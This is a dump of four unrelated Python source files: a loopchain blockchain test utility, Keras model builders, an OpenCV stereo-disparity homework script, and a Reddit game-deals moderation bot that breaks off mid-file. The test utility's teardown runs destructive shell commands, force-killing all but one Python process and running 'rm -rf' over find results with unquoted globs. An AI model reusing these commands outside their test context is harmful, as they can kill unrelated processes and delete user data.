stub_class=loopchain_pb2_grpc.RadioStationStub\n )\n\n return process, stub\n\n\ndef run_score_server_as_process(amqp_key):\n args = ['python3', 'loopchain.py', 'score',\n '--channel', conf.LOOPCHAIN_DEFAULT_CHANNEL,\n '--amqp_key', amqp_key,\n '--score_package', \"score_package\",\n '-d']\n logging.debug(f\"run_score_server_as_process ({args})\")\n return CommonSubprocess(args)\n\n\nasync def run_score_server_as_process_and_stub_async():\n amqp_key = str(time.time())\n process = run_score_server_as_process(amqp_key)\n\n StubCollection().amqp_target = conf.AMQP_TARGET\n StubCollection().amqp_key = amqp_key\n\n logging.debug(f'{StubCollection().amqp_key} score hello')\n\n await StubCollection().create_score_stub(conf.LOOPCHAIN_DEFAULT_CHANNEL, 'score_package')\n await StubCollection().score_stubs[conf.LOOPCHAIN_DEFAULT_CHANNEL].async_task().hello()\n\n logging.debug(f'{StubCollection().amqp_key} score hello complete')\n\n return process, StubCollection().score_stubs[conf.LOOPCHAIN_DEFAULT_CHANNEL]\n\n\ndef print_testname(testname):\n print(\"\\n======================================================================\")\n print(\"Test %s Start\" % testname)\n 
print(\"======================================================================\")\n\n\ndef make_key_value_store(store_identity=\"\") -> KeyValueStore:\n store_default_path = './' + (store_identity, \"db_test\")[store_identity == \"\"]\n store_path = store_default_path\n store = None\n retry_count = 0\n\n while store is None and retry_count < conf.MAX_RETRY_CREATE_DB:\n try:\n uri = f\"file://{store_path}\"\n store = KeyValueStore.new(uri, create_if_missing=True)\n logging.debug(f\"make key value store uri: {uri}\")\n except KeyValueStoreError:\n store_path = store_default_path + str(retry_count)\n retry_count += 1\n\n return store\n\n\ndef close_open_python_process():\n # ubuntu patch\n if platform == \"darwin\":\n os.system(\"pkill -f python\")\n os.system(\"pkill -f Python\")\n else:\n os.system(\"pgrep -f python | tail -$((`pgrep -f python | wc -l` - 1)) | xargs kill -9\")\n\n\ndef clean_up_temp_db_files(kill_process=True):\n from pathlib import Path\n loopchain_root = Path(os.path.dirname(loopchain.__file__)).parent\n\n if kill_process:\n close_open_python_process()\n\n print(f\"loopchain root : {loopchain_root}\")\n\n os.system(f'rm -rf $(find {loopchain_root} -name db_*)')\n os.system(f'rm -rf $(find {loopchain_root} -name *test_db*)')\n os.system(f'rm -rf $(find {loopchain_root} -name *_block)')\n os.system(f\"rm -rf {loopchain_root}/testcase/db_*\")\n os.system(f\"rm -rf {loopchain_root}/.storage\")\n time.sleep(1)\n\n\ndef clean_up_mq():\n os.system(\"rabbitmqctl stop_app\")\n os.system(\"rabbitmqctl reset\")\n os.system(\"rabbitmqctl start_app\")\n\n\ndef create_basic_tx(peer_auth: Signer) -> Transaction:\n \"\"\"\n :param peer_auth:\n :return: transaction\n \"\"\"\n tx_builder = TransactionBuilder.new(\"0x3\", TransactionVersioner())\n tx_builder.private_key = peer_auth._private_key\n tx_builder.to_address = Address(\"hx3f376559204079671b6a8df481c976e7d51b3c7c\")\n tx_builder.value = 1\n tx_builder.step_limit = 100000000\n tx_builder.nid = 3\n return tx_builder.build()\n\n\ndef add_genesis_block():\n tx_info = None\n channel = conf.LOOPCHAIN_DEFAULT_CHANNEL\n\n if \"genesis_data_path\" in conf.CHANNEL_OPTION[channel]:\n genesis_data_path = conf.CHANNEL_OPTION[channel]['initial_genesis_block_data_file_path']\n util.logger.spam(f\"Try load a file of initial genesis block from ({genesis_data_path})\")\n try:\n with open(genesis_data_path) as json_file:\n tx_info = json.load(json_file)[\"transaction_data\"]\n util.logger.spam(f\"generate_genesis_block::tx_info >>>> {tx_info}\")\n\n except FileNotFoundError as e:\n exit(f\"cannot open json file in ({genesis_data_path}): \"\n f\"{e}\")\n\n block = Block(channel_name=channel)\n block.block_status = BlockStatus.confirmed\n genesis_validator = get_genesis_tx_validator(channel)\n is_valid, tx = genesis_validator.init_genesis_tx(tx_info)\n\n if is_valid:\n block.put_genesis_transaction(tx)\n\n block.generate_block()\n # 제네시스 블럭을 추가 합니다.\n return block\n\n\nclass TestServerManager(metaclass=SingletonMetaClass):\n \"\"\"\n\n \"\"\"\n\n def __init__(self):\n self.__test_port_diff = random.randrange(1, 30) * -50\n self.__radiostation_port = conf.PORT_RADIOSTATION + self.__test_port_diff\n\n # rs and peer info is tuple (process, stub_manager, port)\n self.__rs_info = ()\n self.__peer_info = {} # {num:peer_info}\n self.__score = None\n\n def start_servers(self, peer_count, score=None):\n \"\"\"Start BlockChain network rs and peer\n\n :param peer_count: num of peers but 0 means start only RS.\n :return:\n \"\"\"\n 
logging.debug(\"TestServerManager start servers\")\n self.__score = score\n\n # run radio station\n process, stub_manager = run_radio_station_as_process_and_stub_manager(self.__radiostation_port)\n self.__rs_info = (process, stub_manager, self.__radiostation_port)\n time.sleep(2)\n\n for i in range(peer_count):\n peer_port = conf.PORT_PEER + (i * 7) + self.__test_port_diff\n process, stub_manager = run_peer_server_as_process_and_stub_manager(\n peer_port, self.__radiostation_port, score=score)\n self.__peer_info[i] = (process, stub_manager, peer_port)\n time.sleep(2)\n\n def stop_all_server(self):\n for i in self.__peer_info:\n self.__peer_info[i][1].call_in_times(\n \"Stop\",\n loopchain_pb2.StopRequest(reason=\"TestServerManager\"), conf.GRPC_TIMEOUT)\n self.__rs_info[1].call_in_times(\n \"Stop\",\n loopchain_pb2.StopRequest(reason=\"TestServerManager\"), conf.GRPC_TIMEOUT)\n\n time.sleep(2)\n\n for i in self.__peer_info:\n self.__peer_info[i][0].join()\n self.__rs_info[0].join()\n\n def stop_peer(self, num):\n self.__peer_info[num][1].call_in_times(\n \"Stop\",\n loopchain_pb2.StopRequest(reason=\"TestServerManager\"), conf.GRPC_TIMEOUT)\n time.sleep(2)\n self.__peer_info[num][0].join()\n\n def start_peer(self, num):\n peer_port = conf.PORT_PEER + (num * 7) + self.__test_port_diff\n process, stub_manager = run_peer_server_as_process_and_stub_manager(\n peer_port, self.__radiostation_port, score=self.__score)\n self.__peer_info[num] = (process, stub_manager, peer_port)\n time.sleep(1)\n\n def add_peer(self):\n num = 0\n return num\n\n def get_stub_rs(self):\n return self.__rs_info[1].stub\n\n def get_stub_peer(self, num=0):\n return self.__peer_info[num][1].stub\n\n def get_port_rs(self):\n return self.__radiostation_port\n\n def get_port_peer(self, num):\n return self.__peer_info[num][2]\n\n def status(self):\n \"\"\"\n\n :return: json object for ServerManager status\n \"\"\"\n pass\n","sub_path":"testcase/unittest/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":11465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"650500287","text":"#!/usr/bin/env python\n\nfrom keras.layers import Input,Dense,LSTM,RepeatVector,concatenate,Conv2D,MaxPooling2D,Dropout,Flatten,UpSampling2D\nfrom keras.models import Model,Sequential\n\nimport keras\n\ndef model_type_1(n_neurons,seq_length, featureSize):\n\tmodel = Sequential()\n\tmodel.add(LSTM(n_neurons, input_shape=(seq_length, featureSize)))\n\tmodel.add(Dense(6,activation='linear'))\n\tmodel.compile(loss='mean_squared_error', optimizer='adam')\n\treturn model\n\ndef model_type_2(n_neurons,seq_length, featureSize):\n\tsupports = Input(shape=(FeatureSize-6,),name='supports')\n\ttraj = Input(shape=(seq_length,6,),name='traj')\n \n\tsupports_Dense = Dense(1000,activation='relu')(supports)\n\tsupports_Dense = Dropout(0.25)(supports_Dense)\n\n\trepeated_supp = RepeatVector(seq_length)(supports_Dense)\n\tconcat_layer = concatenate([traj, repeated_supp])\n\tlstm_layer = LSTM(n_neurons)(concat_layer)\n\toutput = Dense(6,activation='linear',name='output')(lstm_layer)\n\tmodel = Model(inputs=[supports, traj], outputs=[output])\n\tmodel.compile(optimizer='adam',\n loss={'output': 'mean_squared_error'})\n\treturn model\n \ndef model_type_3(n_neurons,seq_length, featureSize):\n\timages = Input(shape=(128,128,1,),name='supports')\n\n\tx = Conv2D(32, (3, 3), activation='relu', padding='same')(images)\n\tx = MaxPooling2D((2, 2), padding='same')(x)\n\tx = Conv2D(64, (3, 3), 
activation='relu', padding='same')(x)\n\tx = MaxPooling2D((2, 2), padding='same')(x)\n\tx = Conv2D(64, (3, 3), activation='relu', padding='same')(x)\n\tx = MaxPooling2D((2, 2), padding='same')(x)\n\tx = Conv2D(64, (3, 3), activation='relu', padding='same')(x)\n\tencoded = MaxPooling2D((2, 2), padding='same')(x)\n\n\tflattened= Flatten()(encoded)\n\n\tsupports_Dense = Dense(1000,activation='relu')(flattened)\n\tsupports_Dense = Dropout(0.25)(supports_Dense)\n\n\ttraj = Input(shape=(seq_length,6,),name='traj')\n\tnoise = Input(shape=(seq_length,10,),name='noise')\n\n\trepeated_supp = RepeatVector(seq_length)(supports_Dense)\n\tconcat_layer = concatenate([traj, repeated_supp,noise])\n\tlstm_layer = LSTM(n_neurons)(concat_layer)\n\toutput = Dense(6,activation='linear',name='output')(lstm_layer)\n\tmodel = Model(inputs=[images, traj,noise], outputs=[output])\n\tmodel.compile(optimizer='adam',\n loss={'output': 'mean_absolute_error'})\n\treturn model \n","sub_path":"Models.py","file_name":"Models.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"237874034","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\n\ndef HW6():\n \"\"\"Part 1: Read the left and right images. Detect SIFT features on each image.\n Match the features using nearest neighbor matching and the ratio test.\n \"\"\"\n img1 = cv2.imread('plushies_right.png')\n img2 = cv2.imread('plushies_left.png')\n RESIZE = 0.25\n size = int(img1.shape[1]*RESIZE), int(img1.shape[0]*RESIZE)\n img1 = cv2.resize(img1, size)\n img2 = cv2.resize(img2, size)\n kp1, des1 = SIFT(img1)\n kp2, des2 = SIFT(img2)\n # Create a \"brute force\" matcher (BFMatcher) object.\n bf = cv2.BFMatcher()\n # 2.At each video frame, compute the first two nearest-neighbor matches for each keypoint in the video frame\n matches = bf.knnMatch(des1, des2, k=2)\n # 4. 
Draw the matches between the video frame and the target image using cv.drawMatches()\n # 3.Apply the \"ratio test\" to filter out unreliable matches, using a threshold of 0.7\n # store all the good matches as per Lowe's ratio test.\n good = []\n src_pts = []\n dst_pts = []\n for m, n in matches:\n if m.distance < 0.8 * n.distance:\n good.append(m)\n MIN_MATCH_COUNT = 10\n\n\n if len(good) > MIN_MATCH_COUNT:\n src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1,2)\n dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1,2)\n # 1.Fit a homography to the matches using findHomography() with the RANSAC option.\n # Note that you might need to invert the resulting homography matrix using np.linalg.inv().\n draw_params = dict(matchColor=(0, 255, 0), # draw matches in green color\n singlePointColor=None,\n matchesMask=None, # draw only inliers\n flags=2)\n inlier_matches = cv2.drawMatches(img1, kp1, img2, kp2, good, None, **draw_params)\n \"\"\"Part 2: Estimate the essential matrix between the two images using cv.findEssentialMatrix() and the cv.RANSAC option.\n Decompose the essential matrix into a translation vector and two possible rotation vectors using cv.decomposeEssentialMatrix().\n Choose the rotation matrix with no negative numbers on the diagonal as the correct one.\"\"\"\n fx = fy = 485.82423388827533 # focal length\n cx = 134.875 # principle point\n cy = 239.875 # principle point\n K = np.array([[fx, 0, cx], [0, fy, cy], [0, 0, 1]])\n E, mask = cv2.findEssentialMat(src_pts, dst_pts, K, method=cv2.RANSAC)\n R1, R2, t = cv2.decomposeEssentialMat(E)\n R = R1 if diag_pos(R1) else R2\n \"\"\"Part 3: Rectify the two images using cv.stereoRectify(), cv.initUndistortRectifyMap() and cv.remap().\n Estimate the stereo disparity using StereoBM. I recommend a max disparity of 32. 
Show the disparity map.\"\"\"\n R1, R2, P1, P2, Q, validPixROI1, validPixROI2 = cv2.stereoRectify(K, None, K, None, size, R, t)\n map_x1, map_y1 = cv2.initUndistortRectifyMap(K, None, R1, K, size, cv2.CV_32FC1)\n map_x2, map_y2 = cv2.initUndistortRectifyMap(K, None, R2, K, size, cv2.CV_32FC1)\n dst1 = cv2.remap(img1, map_x1, map_y1, cv2.INTER_LANCZOS4)\n dst2 = cv2.remap(img2, map_x2, map_y2, cv2.INTER_LANCZOS4)\n stereo = cv2.StereoBM_create(numDisparities=32, blockSize=5)\n disparity = stereo.compute(cv2.cvtColor(dst1, cv2.COLOR_BGR2GRAY),\n cv2.cvtColor(dst2, cv2.COLOR_BGR2GRAY))\n\n plt.imshow(disparity, 'gray')\n cv2.imshow('dst1', dst1)\n cv2.imshow('dst2', dst2)\n cv2.imshow('matches', inlier_matches)\n plt.show()\n else:\n print(\"Not enough matches are found - {}/{}\".format(len(good), MIN_MATCH_COUNT))\n #cv2.imshow('inliner matches', inlier_matches)\n while cv2.waitKey(1) != ord('q'):\n 1\n\n\n\n\n\n\n\n\ndef SIFT(img1):\n # part 1\n # 1.Load the \"stones\" image and convert it to grayscale.\n\n gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n # 2.Detect SIFT features and compute descriptors for them using sift.detectAndCompute().\n sift = cv2.xfeatures2d.SIFT_create()\n kp, des = sift.detectAndCompute(gray, None)\n return kp, des\n\ndef diag_pos(M):\n pos = True\n for i in range(M.shape[0]):\n if M[i][i] < 0:\n print(M[i][i])\n pos = False\n return pos\n\n\nif __name__ == '__main__':\n HW6()\n","sub_path":"HW6/HW6.py","file_name":"HW6.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"83845982","text":"#!/usr/bin/python3\n\nimport sqlite3\nimport time\nimport praw\nimport prawcore\nimport requests\nimport os\nimport datetime\nimport Config\nimport logging\nimport re\nimport dateparser\n\nos.environ['TZ'] = 'UTC'\n\nfrom bs4 import BeautifulSoup\nreddit = praw.Reddit(client_id=Config.cid,\n client_secret=Config.secret,\n password=Config.password,\n user_agent=Config.agent,\n username=Config.user)\nsubreddit = reddit.subreddit(Config.subreddit)\n\napppath='/home/reddit/gamedealsbot/'\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename=apppath+'reddit_response.log',\n filemode='a')\n\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger('').addHandler(console)\n\n\nclass Error(Exception):\n \"\"\"Base class\"\"\"\n pass\n\nclass LinkError(Error):\n \"\"\"Could not parse the URL\"\"\"\n pass\n\n# make an empty file for first run\nf = open(apppath+\"postids.txt\",\"a+\")\nf.close()\n\n\ndef getsteamexpiry(steamurl):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36'}\n cookies = {\n 'wants_mature_content': '1',\n 'birthtime': '-2148631199',\n 'lastagecheckage': '1-0-1902' }\n r = requests.get(steamurl, headers=headers, cookies=cookies )\n # Offer ends 13 June
\n    if re.search("\$DiscountCountdown", r.text) is not None:\n        match1 = re.search("\$DiscountCountdown, ([\d]+)", r.text)\n        return match1.group(1)\n    elif re.search("Offer ends ([\w\ ]+)\", r.text) is not None:\n        match1 = re.search("Offer ends ([\w\ ]+)
\", r.text)\n enddate= dateparser.parse( \"10am \" + match1.group(1) , settings={'PREFER_DATES_FROM': 'future', 'TIMEZONE': 'US/Pacific','TO_TIMEZONE': 'UTC' } )\n return time.mktime( enddate.timetuple() )\n return\n\n\n\ndef logID(postid):\n f = open(apppath+\"postids.txt\",\"a+\")\n f.write(postid + \"\\n\")\n f.close()\n\n\ndef respond(submission):\n post_footer = True\n footer = \"\"\"\n\nIf this deal has expired, you can reply to this comment with `\"\"\"+Config.expired_trigger+\"\"\"` to automatically close it. \nIf this deal has been mistakenly closed or has been restocked, you can open it again by replying with `\"\"\"+Config.restore_trigger+\"\"\"`. \n[^(more information)](https://www.reddit.com/r/GameDeals/wiki/gamedealsbot) \n^(Note: To prevent abuse, requests are logged publicly. Intentional abuse will likely result in a ban.)\n\"\"\"\n\n reply_reason = \"Generic Post\"\n reply_text = \"\"\n\n### Find all URLS inside a .self post\n urls = []\n if submission.author.name == \"gamedealsmod\":\n logging.info(\"gamedealsmod posted, skipping: \" + submission.title)\n return\n if submission.is_self:\n urls = re.findall('(?:(?:https?):\\/\\/)?[\\w/\\-?=%.]+\\.[\\w/\\-?=%.]+', submission.selftext)\n if len(urls) == 0:\n logging.info(\"NO LINK FOUND skipping: \" + submission.title)\n logID(submission.id)\n return\n # remove duplicate URLs\n unique_urls = []\n for url in urls:\n if url in unique_urls:\n continue\n else:\n unique_urls.append(url)\n\n url = urls[0] ### use only the first url\n### get url for link post\n if not submission.is_self:\n url = submission.url\n\n\n if \"epicgames.com\" in url.lower():\n if \"free\" in submission.title.lower():\n postdate = dateparser.parse( str(submission.created_utc) , settings={'TO_TIMEZONE': 'US/Pacific', 'TIMEZONE': 'UTC' } )\n\n# if postdate.hour < 8 or postdate.hour > 9: # used for xmas rule, before being permanently disabled via AM to block community posting due to excessive need to moderate\n if postdate.weekday() == 3 and postdate.hour < 8: # removed for EGS's 15 days of games to make the rule more active\n logging.info( \"removing early EGS post | https://redd.it/\" + submission.id )\n reply = \"* We require a deal to be live before posting a submission.\"\n reply = \"* Either this deal has already been submitted,\\n\\n* Or this deal has been submitted before it is live.\"\n comment = submission.reply(\"Unfortunately, your submission has been removed for the following reasons:\\n\\n\" +\n reply +\n \"\\n\\nI am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](https://www.reddit.com/message/compose/?to=/r/GameDeals) if you have any questions or concerns.\"\n )\n submission.mod.remove()\n comment.mod.distinguish(sticky=True)\n logID(submission.id)\n return\n\n\n if re.search(\"store.steampowered.com/(sub|app)\", url) is not None:\n if submission.author_flair_css_class is not None and submission.is_self:\n return\n r = requests.get( url )\n\n if re.search(\"WEEK LONG DEAL\", r.text) is not None:\n today = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n monday = today - datetime.timedelta(days=today.weekday())\n datetext = monday.strftime('%Y%m%d')\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM weeklongdeals WHERE week = ' + datetext )\n rows = cursorObj.fetchall()\n if len(rows) == 0:\n removereason = \"* It appears to be a part of the Weeklong deals. 
\\n\\nAs there are multiple games on sale, please post a thread with more games in the title [with this link](https://store.steampowered.com/search/?filter=weeklongdeals).\\n\\nIf you are the developer or publisher of this game, please leave a detailed disclosure as a top level comment as per [Rule 9](https://www.reddit.com/r/GameDeals/wiki/rules#wiki_9._developers_and_publishers), then [contact the mods for approval](https://www.reddit.com/message/compose?to=%2Fr%2FGameDeals).\"\n else:\n removereason = \"* It appears to be a part of the [Weeklong deals](https://redd.it/\" + rows[0][2] + \"). \\n\\nAs there are multiple games on sale, please include a comment within the existing thread to discuss this deal.\\n\\nIf you are the developer or publisher of this game, please leave a detailed disclosure as a top level comment as per [Rule 9](https://www.reddit.com/r/GameDeals/wiki/rules#wiki_9._developers_and_publishers), then [contact the mods for approval](https://www.reddit.com/message/compose?to=%2Fr%2FGameDeals).\"\n comment = submission.reply(\"Unfortunately, your submission has been removed for the following reasons:\\n\\n\" + \n removereason +\n \"\\n\\nI am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](https://www.reddit.com/message/compose/?to=/r/GameDeals) if you have any questions or concerns.\"\n )\n comment.mod.distinguish(sticky=True)\n submission.mod.remove()\n return\n\n\n getexp = getsteamexpiry( url )\n if getexp is not None:\n try:\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('INSERT into schedules(postid, schedtime) values(?,?)',(submission.id,getexp) )\n con.commit()\n con.close()\n logging.info(\"[Steam] | \" + submission.title + \" | https://redd.it/\" + submission.id )\n logging.info(\"setting up schedule: bot for: \" + submission.id)\n reply_reason = \"Steam Game\"\n post_footer = False\n #reply_text = \"^(automatic deal expiry set for \" + datetime.datetime.fromtimestamp(int(getexp)).strftime('%Y-%m-%d %H:%M:%S') + \" UTC)\\n\\n\"\n except:\n pass\n\n### Bundle Giveaways\n if re.search(\"(fanatical\\.com/(.*)bundle|(?!freebies\\.)indiegala\\.com(?!(/store|/crackerjack)))\", url) is not None:\n if re.search(\"indiegala.com.+giveaway\", url) is None and re.search(\"freebies.indiegala.com\", url) is None:\n reply_reason = \"Bundle Giveaway\"\n reply_text = \"\"\"\n**Giveaways**\n\nIf you wish to give away your extra game keys, please post them under this comment only. Do not ask for handouts or trades.\"\"\"\n\n### Bundle Giveaways for Humble\n if re.search(\"(humblebundle\\.com(?!(/g/|/store|/monthly)))\", url) is not None:\n if re.search(\"indiegala.com.+giveaway\", url) is None and re.search(\"freebies.indiegala.com\", url) is None:\n reply_reason = \"Bundle Giveaway\"\n reply_text = \"\"\"\n**Warning**\n\nWith current reports of Humble Bundle account access being restricted, we would like to remind people that the supplied keys are for personal use only as stated on the bundle pages. There may be a risk of account suspensions on Humble Bundle for trading/gifting. \n[^(more information)](https://redd.it/hwobv8)\n\n**Giveaways**\n\nIf you wish to give away your extra game keys, please post them under this comment only. Do not ask for handouts or trades.\"\"\"\n\n reply_text = \"\"\"\n**Giveaways**\n\nIf you wish to give away your extra game keys, please post them under this comment only. 
Do not ask for handouts or trades.\"\"\"\n\n### chrono.gg auto expire\n if re.search(\"chrono.gg\", url) is not None:\n try:\n r = requests.get( url )\n match1 = re.search('\"endsAt\":\"([\\w\\-\\:\\.]+)\"', r.text)\n enddate= dateparser.parse( match1.group(1) , settings={'PREFER_DATES_FROM': 'future', 'TO_TIMEZONE': 'UTC' } )\n expdate = time.mktime( enddate.timetuple() )\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('INSERT into schedules(postid, schedtime) values(?,?)',(submission.id,expdate) )\n con.commit()\n con.close\n logging.info(\"[Chrono] | \" + submission.title + \" | https://redd.it/\" + submission.id )\n logging.info(\"setting up schedule: bot for: \" + submission.id)\n reply_reason = \"chrono.gg\"\n post_footer = False\n #reply_text = \"^(automatic deal expiry set for \" + datetime.datetime.fromtimestamp(int(expdate)).strftime('%Y-%m-%d %H:%M:%S') + \" UTC)\\n\\n\"\n except:\n pass\n\n### GamersGate coupon Info\n if re.search(\"gamersgate.com\", url) is not None:\n reply_reason = \"GamersGate Coupon\"\n reply_text = \"\"\"\n**Coupon** \nUse the site-wide coupon `RGAMEDEALS` for an additional 10% off. \n^(May not be available on all offers. We do not receive compensation for this code.)\"\"\"\n\n### 2game coupon Info\n if re.search(\"2game.com\", url) is not None:\n reply_reason = \"2Game Coupon\"\n reply_text = \"\"\"\n**Coupon** \nUse the site-wide coupon `RGAMEDEALS` for an additional 10% off. \n^(May not be available on all offers. We do not receive compensation for this code.)\"\"\"\n\n### oculiumvr.com Info\n if re.search(\"oculiumvr.com\", url) is not None:\n reply_reason = \"2Game Coupon\"\n reply_text = \"\"\"\n**Notice** \nOculiumVR sells game keys that are redeemable on the Oculus Store. OculiumVR is based in Australia and charges in AUD, so outside purchases may incur a conversion fee.\n\"\"\"\n\n### allyouplay coupon Info\n if re.search(\"allyouplay.com\", url) is not None:\n reply_reason = \"allyouplay Coupon\"\n reply_text = \"\"\"\n**Coupon** \nUse the site-wide coupon `RGAMEDEALS` for an additional 10% off. \n^(May not be available on all offers. We do not receive compensation for this code.)\"\"\"\n\n### Voidu coupon Info\n if re.search(\"voidu.com\", url) is not None:\n reply_reason = \"Voidu Coupon\"\n#**Notice:** Payment is only possible in euros. Purchases with other currencies are still possible, but currency conversion fees will apply. As such, listed prices are only a guide unless paying in euros.\n reply_text = \"\"\"\n**Coupon** \nUse the site-wide coupon `RGAMEDEALS` for an additional 10% off. \n^(May not be available on all offers. We do not receive compensation for this code.)\"\"\"\n\n\n\n### GOG.com Info\n if re.search(\"gog.com\", url) is not None:\n reply_reason = \"GOG.com Info\"\n reply_text = \"\"\"\nGOG.com sells games that are completely DRM-free. This means that there is nothing preventing or limiting you from installing and playing the game. \n\n**As such, games from GOG never come with Steam keys.**\n\n[More Information](https://support.gog.com/hc/en-us/articles/360001947574-FAQ-What-is-GOG-COM-?product=gog)\n\nThis message is posted automatically to inform new users about what this service provides in order to answer some commonly asked questions.\"\"\"\n\n### Itch.io\n# if re.search(\"itch.io\", url) is not None:\n# reply_reason = \"Itch.io Info\"\n# reply_text = \"\"\"\n#Games from EA Origin do not come with Steam keys, unless explicitly stated. 
Origin games will require the download and use of the Origin client. If you wish to add a game shortcut to your Steam library, you can do so by adding it as a *Non-Steam Game* from the *Games* menu of the Steam client.\n#\n#[More Information](http://www.origin.com/us/faq)\"\"\"\n#\n### Origin\n if re.search(\"origin.com\", url) is not None:\n reply_reason = \"Origin Info\"\n reply_text = \"\"\"\nGames from EA Origin do not come with Steam keys, unless explicitly stated. Origin games will require the download and use of the Origin client. If you wish to add a game shortcut to your Steam library, you can do so by adding it as a *Non-Steam Game* from the *Games* menu of the Steam client.\n\n[More Information](http://www.origin.com/us/faq)\"\"\"\n\n### Groupees Preorders\n\n if re.search(\"groupees.com\", url) is not None:\n if re.search(\"(pre-?order|pre-?purchase|preorder|pre order|presale|pre sale|pre-sale)\", submission.title.lower() ) is not None:\n reply_reason = \"Groupees Preorder\"\n reply_text = \"\"\"\nAbout Groupees' pre-orders: \n\nThis is a blind pre-purchase of the full bundle at a reduced price. The games will be revealed tomorrow at normal price\"\"\"\n\n\n### IndieGala Giveaway Explanation\n if re.search(\"indiegala\\.com.+giveaway\", url) is not None:\n reply_reason = \"IndieGala giveaways\"\n reply_text = \"IndieGala giveaways are usually located towards the bottom of the page. You may need to dismiss a banner image or confirm a captcha to claim a key.\\n\"\n\n### IndieGala freebies Explanation\n if re.search(\"freebies\\.indiegala\\.com\", url) is not None:\n reply_reason = \"IndieGala freebies\"\n reply_text = \"IndieGala freebies are usually DRM-free downloads. In these cases no Steam key will be provided.\"\n\n### Fireflower Games\n if re.search(\"fireflowergames\\.com\", url) is not None:\n reply_reason = \"Fireflower Games\"\n reply_text = \"\"\"\nFireFlower Games sells games that are completely DRM-free. 
This means that there is nothing preventing or limiting you from installing and playing the game.\n\n**As such, games from FireFlower Games never come with Steam keys.**\n\n[More Information](https://fireflowergames.com/faq)\n\nThis message is posted automatically to answer some commonly asked questions about what this service provides\"\"\"\n\n### Amazon US Charities\n if re.search(\"(amazon\\.com\\/(.*\\/)?dp|amazon\\.com\\/(.*\\/)?gp\\/product|amazon\\.com\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.com)\\/(\\w{10})\", url) is not None:\n match1 = re.search(\"(amazon\\.com\\/(.*\\/)?dp|amazon\\.com\\/(.*\\/)?gp\\/product|amazon\\.com\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.com)\\/(\\w{10})\", url)\n amzn = match1.group(5)\n reply_reason = \"Amazon US Charities\"\n reply_text = \"\"\"\nCharity links:\n\n* [Child's Play](https://smile.amazon.com/dp/\"\"\"+amzn+\"\"\"?tag=childsplaycha-20)\n* [Electronic Frontier Foundation](https://smile.amazon.com/dp/\"\"\"+amzn+\"\"\"?tag=electronicfro-20)\n* [Able Gamers](https://smile.amazon.com/dp/\"\"\"+amzn+\"\"\"?tag=ablegamers-20)\n* [Mercy Corps](https://smile.amazon.com/dp/\"\"\"+amzn+\"\"\"?tag=mercycorps-20)\"\"\"\n\n### Amazon US Charities NODE\n if re.search(\"amazon\\.com\\/.*node=(\\d+)\", url) is not None:\n match1 = re.search(\"(amazon\\.com\\/(.*\\/)?dp|amazon\\.com\\/(.*\\/)?gp\\/product|amazon\\.com\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.com)\\/(\\w{10})\", url)\n amzn = match1.group(1)\n reply_reason = \"Amazon US Charities\"\n reply_text = \"\"\"\nCharity links:\n\n* [Child's Play](https://smile.amazon.com/b/?node=\"\"\"+amzn+\"\"\"&tag=childsplaycha-20)\n* [Electronic Frontier Foundation](https://smile.amazon.com/b/?node=\"\"\"+amzn+\"\"\"&tag=electronicfro-20)\n* [Able Gamers](https://smile.amazon.com/b/?node=\"\"\"+amzn+\"\"\"&tag=ablegamers-20)\n* [Mercy Corps](https://smile.amazon.com/b/?node=\"\"\"+amzn+\"\"\"&tag=mercycorps-20)\"\"\"\n\n\n### Amazon UK Charities\n if re.search(\"(amazon\\.co\\.uk\\/(.*\\/)?dp|amazon\\.co\\.uk\\/(.*\\/)?gp\\/product|amazon\\.co\\.uk\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.co\\.uk)\\/(\\w{10})\", url) is not None:\n match1 = re.search(\"(amazon\\.co\\.uk\\/(.*\\/)?dp|amazon\\.co\\.uk\\/(.*\\/)?gp\\/product|amazon\\.co\\.uk\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.co\\.uk)\\/(\\w{10})\", url)\n amzn = match1.group(5)\n reply_reason = \"Amazon UK Charities\"\n reply_text = \"\"\"\nCharity links:\n\n* [Centre Point](https://www.amazon.co.uk/dp/\"\"\"+amzn+\"\"\"?tag=centrepoint01-21)\"\"\"\n\n### Amazon UK Charities NODE\n if re.search(\"amazon\\.co\\.uk\\/.*node=(\\d+)\", url) is not None:\n match1 = re.search(\"amazon\\.co\\.uk\\/.*node=(\\d+)\", url)\n amzn = match1.group(1)\n reply_reason = \"Amazon UK Charities\"\n reply_text = \"\"\"\nCharity links:\n\n* [Centre Point](https://www.amazon.co.uk/dp/?node=\"\"\"+amzn+\"\"\"&tag=centrepoint01-21)\"\"\"\n\n\n\n if post_footer:\n if 